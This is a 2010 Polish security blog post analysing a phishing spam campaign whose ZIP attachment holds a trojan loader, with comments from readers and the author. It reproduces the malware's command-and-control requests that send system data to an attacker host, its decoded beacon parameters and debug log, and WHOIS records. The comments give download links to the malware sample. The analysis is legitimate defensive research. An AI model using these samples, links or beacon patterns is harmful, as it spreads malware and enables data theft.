Zamiast świątecznych jajek otrzymałem informacje o blokadzie konta: account notification

Blog

Zamiast świątecznych jajek otrzymałem informacje o blokadzie konta: account notification

Data dodania:

05 4.10

Kategorie:

analizy, newsy

Autor:

Borys Łącki

Spodziewałem się więcej jajek w mailach, w których złośliwe oprogramowanie robi sobie ze mnie jaja myśląc, że uruchomię “pocztówkę” przysłaną od miliarda moich botnetowych przyjaciół. A tu zostałem zalany spamem o temacie: moja_domena.com account notification. I rozumiem, że miał taki mail zadziałać w moje uczucie troski o bezpieczeństwo tak ważnego tematu jakim jest domena, ale w święta?! W święta powinienem otrzymać jajko i zajączka wyskakującego z pięknym .exe. Uwzględniając jednak fakt, że otrzymałem tych maili sporo i dla kilku domen, skuteczność zapewne była jak zawsze na odpowiednio zadowalającym poziomie :]

Różne pola From, różne nagłówki X-mailer, różne adresy IP, a treść wiadomości wygląda tak:

Dear Customer,
This e-mail was send by moja_domena.com to notify you that we have temporanly prevented access to your account.
We have reasons to beleive that your account may have been accessed by someone else. Please run attached file and Follow instructions
(C) moja_domena.com

W załączniku w każdym przypadku:

Application/ZIP (Name: “Instructions.zip”) 122 KB

Po rozpakowaniu:

instructions.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

A po wrzuceniu do serwisu VirusTotal.com raport wygląda tak:

MD5: 5d5a3c1669421ce94f6f15e917c150db
First received: 2010.04.05 11:53:02 UTC
Date: 2010.04.05 13:01:28 UTC [<1D]
Results: 3/39

Czyli 3 silniki antywirusowe wykryły szkodliwość pliku i w zasadzie mogę śmiało stwierdzić, że to na pewno informacja dotycząca blokady mojego konta, a nie żadne zuo ;] W takim razie uruchamiam.

W pierwszej kolejności zauważymy zapytanie o domenę i odpowiedź:

DNS Standard query A newsafetyplace_com

DNS Standard query response A 204.12.226.170

By po chwili udając zgłosić się udając przeglądarkę stron WWW do centrali:

GET /httpss/ldr123.php?v=21&step=1&hostid=2E8A9B60D0E4CD9A72FB8E2B2954CC71 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8)
Host: newsafetyplace_com
Connection: Keep-Alive

Niestety chyba już ktoś wyłączył tudzież popsuł centralę gdyż odpowiada błędem braku strony 404 (lub sprytnie udaje, że tak odpowiada)

Not Found

The requested URL /httpss/ldr123.php was not found on this server.

Apache/2.2.9 (Debian) PHP/5.3.2-0.dotdeb.1 with Suhosin-Patch Server at newsafetyplace_com Port 80

Odnoszę jednak wrażenie, że strony nie ma dlatego, że po chwili następuje ponowne wysłanie tego samego zapytania i tak 4 razy.

I nagle pobieramy teoretycznie plik, który poprawnie zwraca odpowiedź od serwera (tak na prawdę nie jest przesyłany plik, a jedynie odpowiedź OK):

/getfile.php?r=-107945997&p=TUFDSElORT0yRThBOUI2MEQwRTRDRDlBNzJGQjhFMkIyOTU0Q0M3MQ0KT1A9SU5GTw0KVFJLPTI0

który to parametr “p” po zdekodowaniu base64 wygląda:

MACHINE=2E8A9B60D0E4CD9A72FB8E2B2954CC71
OP=INFO
TRK=24

Po tym wszysktim następuje punkt kulminacyjny i przesyłane zostają informacje o moim systemie operacyjnym (znów niestety w miejsce, którego, być może rzekomo – nie ma):

POST /logs2/log.php?hostid=2E8A9B60D0E4CD9A72FB8E2B2954CC71&tm=1170378637&affid=24 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Internet Exloprer
Host: newsafetyplace_com
Content-Length: 19744
Cache-Control: no-cache

Informacje zawierają listę procesów, wersję procesora, systemu itp.:

[05/04/10 16:43:53:183 01a0] Iteration 1
[05/04/10 16:43:53:183 01a0] Version: OS:5.1, BLD:xxxx, PLTF:x, SPS:Dodatek Service Pack 3, SP:xxxxx.xx, STMSK:xxxxx, PROD:xx
[05/04/10 16:43:53:183 01a0] Platform:AMD Sempron(tm) Processor xxxx+(x86 Family 15 Model 44 Stepping 2)
[05/04/10 16:43:53:183 01a0] Dumping processes {
[05/04/10 16:43:53:203 01a0] N:[System Process].P:0
[05/04/10 16:43:53:203 01a0] N:System.P:4
[05/04/10 16:43:53:203 01a0] N:SMSS.EXE.P:324
[05/04/10 16:43:53:203 01a0] N:CSRSS.EXE.P:612

…

[05/04/10 16:43:53:213 01a0] Installed soft dump {
[05/04/10 16:43:53:213 01a0] K:Adobe Flash Player ActiveX.N:Adobe Flash Player 10 ActiveX
[05/04/10 16:43:53:213 01a0] K:Connection Manager.N:
[05/04/10 16:43:53:213 01a0] K:DirectAnimation.N:
[05/04/10 16:43:53:213 01a0] K:DirectDrawEx.N:
[05/04/10 16:43:53:213 01a0] K:KB923561.N:Aktualizacja zabezpiecze. dla systemu Windows XP (KB923561)
[05/04/10 16:43:53:213 01a0] K:KB938464.N:Aktualizacja zabezpiecze. dla systemu Windows XP (KB938464)
[05/04/10 16:43:53:213 01a0] K:KB946648.N:Aktualizacja zabezpiecze. dla systemu Windows XP (KB946648)
[05/04/10 16:43:53:213 01a0] K:KB950760.N:Aktualizacja zabezpiecze. dla systemu Windows XP (KB950760)
[05/04/10 16:43:53:213 01a0] K:KB950762.N:Aktualizacja zabezpiecze. dla systemu Windows XP (KB950762)
[05/04/10 16:43:53:213 01a0] K:KB950974.N:Aktualizacja zabezpiecze. dla systemu Windows XP (KB950974)

…

[05/04/10 16:43:53:223 01a0] Installed soft dump }
[05/04/10 16:43:53:223 01a0] Startup loader [C:\instructions.exe], hostid [2E8A9B60D0E4CD9A72FB8E2B2954CC71]
[05/04/10 16:43:53:223 01a0] WinMain.Waiting for mutex.GLE:00000000
[05/04/10 16:43:53:834 01a0] WinMain.Mutex owned, creating loader object.GLE:00000006
[05/04/10 16:43:53:834 01a0] CSpreadingManager::CSpreadingManager.Checking event is c_6DD753CC456B3D28FCF3B8B72C6D073B.GLE:00000006
[05/04/10 16:43:53:834 01a0] CMultiLoader::CMultiLoader
[05/04/10 16:43:53:834 01a0] IsAdmin: 1
[05/04/10 16:43:53:834 01a0] === begin loading config ===
[05/04/10 16:43:53:834 01a0] === end loading config ===
[05/04/10 16:43:53:834 01a0] Loaded config: tracking [24], magic [LDRCFG]
[05/04/10 16:43:53:834 01a0] Additional url parameter: [affid=24]
[05/04/10 16:43:53:834 01a0] CAutorunManager::CAutorunManager.Loading HKLM\Run.GLE:00000000
[05/04/10 16:43:54:475 01a0] CMultiLoader::Work
[05/04/10 16:43:54:475 01a0] get url [http://windowsupdate.microsoft.com] {
[05/04/10 16:43:54:766 0524] autorun
[05/04/10 16:43:55:266 0524] spreading
[05/04/10 16:43:55:667 01a0] InternetOpenUrlW ok
[05/04/10 16:43:55:667 01a0] Download started. Content length 3191
[05/04/10 16:43:55:687 01a0] Recv finished, 3191 recvd, ret 1
[05/04/10 16:43:55:687 01a0] } get url return 1
[05/04/10 16:43:55:687 01a0] CMultiLoader::Work.Loading file info.GLE:00000006
[05/04/10 16:43:56:298 01a0] GetLink: trk[24] machine[2E8A9B60D0E4CD9A72FB8E2B2954CC71] op[INFO]
[05/04/10 16:43:56:298 01a0] Url: [http://newsafetyplace_com/getfile.php?r=-107955996&p=TUFDSElORT0yRThBOUI2MEQwRTRDRDlBNzJGQjhFMkIyOTU0Q0M3MQ0KT1A9SU5GTw0KVFJLPTI0]
[05/04/10 16:43:56:298 01a0] get url [http://newsafetyplace_com/getfile.php?r=-107955996&p=TUFDSElORT0yRThBOUI2MEQwRTRDRDlBNzJGQjhFMkIyOTU0Q0M3MQ0KT1A9SU5GTw0KVFJLPTI0] {
[05/04/10 16:43:56:949 01a0] InternetOpenUrlW ok
[05/04/10 16:43:56:949 01a0] Download started. Content length 2
[05/04/10 16:43:56:949 01a0] Recv finished, 2 recvd, ret 1
[05/04/10 16:43:56:949 01a0] } get url return 1
[05/04/10 16:43:57:560 01a0] CMultiLoader::Work.Server return OK.GLE:00000006
[05/04/10 16:43:57:560 01a0] CMultiLoader::Work.sleep 1800000 ms.GLE:00000006
[05/04/10 16:43:57:560 01a0] ====== endlog ======

Niestety otrzymujemy ponownie odpowiedź 404 aby następnie znów spróbować posłać te dane by na samiutkim końcu otrzymać HTTP/1.1 504 Gateway Time-out :]

Co wesołe do mojego rejestru startowego dodało się wiele usług uruchamiających tę aplikacje. Nie dość, że masowo bo w liczbie sztuk kilku, zarówno do klucza Run jak i RunServices, to do tego bardzo sprytnie, gdyż w nazwach usług zostały wykorzystane aplikacje, które faktycznie mam zainstalowane w systemie. A każde nowe zarażenie to losowe wybranie nowych nazw. Najs :]

I trochę danych WHOISowych dla potomności:

whois NEWSAFETYPLACE_COM

Domain Name: NEWSAFETYPLACE_COM
Registrar: DOMAINCONTEXT, INC.
Whois Server: whois.domaincontext.com
Referral URL: http://www.domaincontext.com
Name Server: NS1.NEWSAFETYPLACE_COM
Name Server: NS2.NEWSAFETYPLACE_COM
Status: clientTransferProhibited
Updated Date: 26-mar-2010
Creation Date: 25-mar-2010
Expiration Date: 25-mar-2011
Registrant:
N/A
Karassartova Indira (elizqybon@hotmail.com)
17 Zholobasbekov
Tastak
Almaty,480012
KZ
Tel. +800.5011067

Creation Date: 25-Mar-2010
Expiration Date: 25-Mar-2011

whois 204.12.226.170

WholeSale Internet, Inc. WHOLESALEINTERNET-3 (NET-204-12-192-0-1)
204.12.192.0 – 204.12.255.255
Krutik Servers WII-2012-10040894 (NET-204-12-226-168-1)
204.12.226.168 – 204.12.226.175

Nie klikajcie tego ;]]]]]]]]
Trackback
- Wykop ten wpis
- Dodaj na OSnews.pl

5 komentarzy do Zamiast świątecznych jajek otrzymałem informacje o blokadzie konta: account notification

Borys Łącki

6 kwietnia, 2010 o godzinie 15:29

Dostałem właśnie nową wersję:

Please click on the following link (or copy & paste it into your web browser):

http://katjusza.home.pl/instructions.exe

Wesołą domenę utrafili :] Sprawdźcie co tam normalnie klika…

I plik jest nowy :}

http://www.virustotal.com/pl/analisis/323836aa134b2b66d8e33802f961b82a88bcc385b4427f46f90005d733218e0e-1270560290
Borys Łącki

7 kwietnia, 2010 o godzinie 09:21

Po zgłoszeniu do działu BOK firmy home.pl (zwyczajowy formularz na ich stronie) – w ciągu kilku godzin zostały podjęte odpowiednie działania.
I to mi się podoba. Czy nie mogłoby tak być wszędzie?
Kolejne miliony ocalone ;]
Piotr

14 kwietnia, 2010 o godzinie 22:08

Rozwalam sobie łindołsa.
Masz ten pliczek :]?
Borys Łącki

15 kwietnia, 2010 o godzinie 09:01

Wersja bodajże 1 przed tym opisywanym:

http://rapidshare.com/files/376068953/Instructions.exe.html
Piotr

15 kwietnia, 2010 o godzinie 13:17

Dzięki. Zaraz wszystko przetestuje :)

BOTHUNTERS.PL bezpieczeństwo, trojan, botnet, wirus i łamanie haseł z serwisu nasza-klasa, hacking i cracking. Ciemna Strona Mocy u nas w świetle reflektorów.

Konto:

Menu główne:

Blog

Zamiast świątecznych jajek otrzymałem informacje o blokadzie konta: account notification

5 komentarzy do Zamiast świątecznych jajek otrzymałem informacje o blokadzie konta: account notification

Napisz komentarz